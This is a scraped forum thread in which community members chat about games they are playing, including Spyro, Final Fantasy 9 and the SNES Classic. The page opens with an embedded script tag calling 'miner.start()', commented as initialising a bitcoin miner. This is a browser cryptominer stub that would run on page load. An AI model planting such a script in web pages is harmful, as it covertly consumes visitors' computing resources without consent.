<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralpge project

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Bean

Re: What games are you playing?

Postby Bean » 1 month ago

I kind of think NSMB U and NSMB2 are both inferior to their predecessors. The U game remixes a lot of stuff that Wii did, and I think that Wii one did better while NSMB2 was just more about coins in a series where collecting coins isn't even that big of a deal. Level design was also just there.

Speaking of sequels that are inferior, while I enjoyed the presentation more, I have to say that Spyro 2 was a little on the weak side compared to the original. It's not bad or anything, but the game kind of felt disjointed with only a couple of challenging parts in total. Not a fan of swimming in that one, but at least they got most of the stuff out of the way early. First one would be like an A- to this one being a straight up average C. Hope the third one's better, but that'll be for a bit later on down the road this month.

Sebby19

Postby Sebby19 » 1 month ago

Just played and beat Iconoclasts, on the Switch. Good game, but it does have some notable flaws. I am still trying to find the last item for 100%, and that not including the secret bosses I have to find. Glad I didn't pay full price for it.

Once that is done, next up is Golf Story (was also on sale). I've heard good things about this one, I hope it lives up to what I heard.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official Raocow subscriber # 30,000

hardcore_crispy
Arrangements in fulminating vective
Pronouns: he/him/his

Postby hardcore_crispy » 1 month ago

Been playing Smash and KH Union X for shits and currently fighting my way through World 7 of ASMBXT.

Think I'm gonna jump on Zero Ranger next.

https://www.youtube.com/user/CrispyMWHC -- I play the games for the internet.
Currently playing: A Super Mario Bros X Thing: Prelude To The Stupid

Bean

Postby Bean » 3 weeks ago

Yeah, I can tell the developers didn't have time to test the camera for one particular side character in Spyro 3 at all. It randomly switches to a top-down and bottom-up view when you approach a cave, and there are totally enemies or hazards in the way in spots here. If it wasn't rushed out the door, I'd be having a blast with this one. As it is, that camera issue and the odd controls on vehicles are bringing down what would be a solid game in a big way.

Bean

Postby Bean » 3 weeks ago

Beat Spyro 3 last night. It was a mix of being good at times and just plain not good in others. Overall, I had a lot of fun with the trilogy, but unlike Crash, this is one series that started at its peak and went on a small downward Spyro into being average at best as it went along.

Parama

Postby Parama » 2 weeks ago

Replaying Recourse, a 3D puzzle game thing-y
They basically remade the entire game and added shinier graphics + a lot of new puzzle elements and it's kind of like playing a different game to some extent, but at the same time some of the same puzzles and elements are still here so it's still the same game but it's like, a really bizarre experience now
If I was suffering, I’d cut the ties that were never meant to bind.

I haven't updated my signature in like half a year oops.

Bean

Postby Bean » 2 weeks ago

Well, raocow's run has me playing through Rayman Origins again. This is the first time I've tried a solo deal though, and I've got to say, you have to be a lot more careful when you don't have that extra player to bring you back. But going for the 350 Lums is still the same since you need those extra hearts. In fact, it's easier since an extra heart would go to any player that doesn't have one first. Here, it's all on you.

Ashan
The world has become a place
First name: Hayden

Postby Ashan » 6 days ago

Been playing the Bowser's Inside Story remake every once in a while since it came out.

It seems like one of the writers of this game really liked the term "KO" because they use it so much, including as a verb which is weird.

SAJewers
hi

Postby SAJewers » 5 days ago

Finally got through Rock Maiden FC. That was an enjoyable experience.
ImageImageImageImage
ImageImageImageImage

Ashan

Postby Ashan » 5 days ago

Finished off Bowser's Inside Story. I forgot how good the final boss music was!
I don't think I'm gonna even look into Bowser Jr's Journey cause it looked to be the same as Bowser's Minions from the Superstar Saga remake, and I don't think I even finished that cause it was kinda boring.

pholtos
Loves adorable things.

Postby pholtos » 5 days ago

Final Fantasy 9 is beaten.

My thoughts:
Besides the battles being slow and otherwise sometimes causing my characters to die by putting in a command 15 seconds ago only to find out the enemy used a thing that would cause me to die if I attacked, this game didn't have too many problems. Story was good, Characters were varied with some cutes, learning skills was fairly obvious. Some status effects weren't really explained and abilities were at times too expensive to really be usable. Quina is a lovable doof, Steiner is a doof. :P
Had an overall enjoyable time. As such, here's my rankings (ordered numerically within rankings):
5/5: 6, 9
4/5: 5, X
3/5: 1, 2
2/5: 7, 8
1/5: 3, 4
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:

The 500 char limit is evil. :P

Bean

Postby Bean » 1 day ago

Hooked up the SNES Classic thing to see if it works. Looks like it does. Always would go for official emulation over the other methods if possible, and it's part of the reason I've been putting off SMW and Yoshi's Island for so long. Guess I could try to hook it to the capture card this weekend and see if that goes better than my attempts at getting the N64 and card to work together for me yesterday.

Sebby19

Postby Sebby19 » 1 day ago

Before I moved out of my parents place, I had a CRT tv in my room that I pulled out of a back alley, got some good mileage out of it for a few years (still have it too).

When I got the SNES Classic, I didn't have much choice but to find a way to use the CRT, since my dad was being arbitrary and woudn't let me use their HD TV. So I bought an adapter that let's you plug in your HD cable on one end, and AV cables to the other.

It, kinda worked. It would often have trouble starting up at all, either showing solid blue or green, or multicolored snow (weird). Otherwise, it played fine (and I laugh at the available CRT option).
But the strangest thing that was a common occurrence was when starting a game from the main menu. The SNES would crash at that button press. And it wouldn't crash if I used an alternate button to start (or the replay feature). Sometimes. It was very specific about it.

Not an issue anymore, since I moved out and my parents were nice enough to buy me an HD TV with airmiles. Though I haven't plugged it in there yet since I still had unfinished business with the Wii U, and now the Switch.
I'm just worried if I damaged the SNES Classic with that converter. Everytime it crashed (even during normal gameplay), it was always at a specific button press.
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official Raocow subscriber # 30,000

Ashan

Postby Ashan » 1 day ago

Sebby19 wrote: my dad was being arbitrary and woudn't let me use their HD TV.
You're gonna give the TV a virus, son

Return to “the cartridgé”